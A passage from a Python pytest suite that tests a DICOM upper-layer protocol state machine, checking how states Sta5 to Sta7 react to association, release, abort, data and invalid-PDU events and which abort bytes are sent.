('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt3']
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [
('recv', None),
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt4', 'AE-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta1 + Evt5."""
# Sta5 + Evt5 -> <ignore> -> Sta5
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta5 + Evt6."""
# Sta5 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt6']
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta5 + Evt7."""
# Sta5 + Evt7 -> <ignore> -> Sta5
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt7']
def test_evt08(self):
"""Test Sta5 + Evt8."""
# Sta5 + Evt8 -> <ignore> -> Sta5
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt8']
def test_evt09(self):
"""Test Sta5 + Evt9."""
# Sta5 + Evt9 -> <ignore> -> Sta5
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt9']
def test_evt10(self):
"""Test Sta5 + Evt10."""
# Sta5 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', p_data_tf),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt10']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt11(self):
"""Test Sta5 + Evt11."""
# Sta5 + Evt11 -> <ignore> -> Sta5
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt11']
def test_evt12(self):
"""Test Sta5 + Evt12."""
# Sta5 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt12']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta5 + Evt13."""
# Sta5 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_release_rp),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta5 + Evt14."""
# Sta5 + Evt14 -> <ignore> -> Sta5
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt14']
def test_evt15(self):
"""Test Sta5 + Evt15."""
# Sta5 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and restart ARTIM
commands = [
('recv', None),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt15']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta5 + Evt16."""
# Sta5 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
        # AA-3: If service user initiated:
        #     Issue A-ABORT primitive and close transport
        # Otherwise
        #     Issue A-P-ABORT primitive and close transport
commands = [
('recv', None),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt16']
def test_evt17(self):
"""Test Sta5 + Evt17."""
        # Sta5 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta1']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt17']
def test_evt18(self):
"""Test Sta5 + Evt18."""
# Sta5 + Evt18 -> <ignore> -> Sta5
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt18']
def test_evt19(self):
"""Test Sta5 + Evt19."""
# Sta5 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState06(TestStateBase):
"""Tests for State 06: Association established and ready for data."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
def test_evt01(self):
"""Test Sta6 + Evt1."""
# Sta6 + Evt1 -> <ignore> -> Sta6
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta6 + Evt2."""
# Sta6 + Evt2 -> <ignore> -> Sta6
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta6 + Evt3."""
# Sta6 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_associate_ac),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt3']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta6 + Evt4."""
# Sta6 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_associate_rj),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt4']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta6 + Evt5."""
# Sta6 + Evt5 -> <ignore> -> Sta6
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta6 + Evt6."""
# Sta6 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_associate_rq),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt6']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta6 + Evt7."""
# Sta6 + Evt7 -> <ignore> -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt7']
def test_evt08(self):
"""Test Sta6 + Evt8."""
# Sta6 + Evt8 -> <ignore> -> Sta6
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt8']
def test_evt09(self):
"""Test Sta6 + Evt9."""
# Sta6 + Evt9 -> DT-1 -> Sta6
# Evt9: Receive P-DATA primitive from <local user>
# DT-1: Send P-DATA-TF PDU
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt9', 'DT-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt9']
def test_evt10(self):
"""Test Sta6 + Evt10."""
# Sta6 + Evt10 -> DT-2 -> Sta6
# Evt10: Receive P-DATA-TF PDU from <remote>
# DT-2: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt10']
def test_evt11(self):
"""Test Sta6 + Evt11."""
# Sta6 + Evt11 -> AR-1 -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt11']
def test_evt12(self):
"""Test Sta6 + Evt12."""
# Sta6 + Evt12 -> AR-2 -> Sta8
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-2: Issue A-RELEASE (rq) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt12']
def test_evt13(self):
"""Test Sta6 + Evt13."""
# Sta6 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_release_rp),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt13', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt13']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt14(self):
"""Test Sta6 + Evt14."""
# Sta6 + Evt14 -> <ignore> -> Sta6
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt14']
def test_evt15(self):
"""Test Sta6 + Evt15."""
# Sta6 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.abort()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt15']
# Issue A-ABORT PDU
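# For AA-1 the abort originates locally: source byte 0x00 (DUL service-user)
# rather than the 0x02 (service-provider) used by AA-8.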
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta6 + Evt16."""
# Sta6 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT, and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt16']
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt17']
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt18']
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta7')
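# From Sta6, the local A-RELEASE (rq) primitive triggers AR-1 (send
# A-RELEASE-RQ PDU) and the FSM waits in Sta7 for the peer's reply.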
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt3']
# The SCP received the A-ASSOCIATE-RQ, A-RELEASE-RQ, then the A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
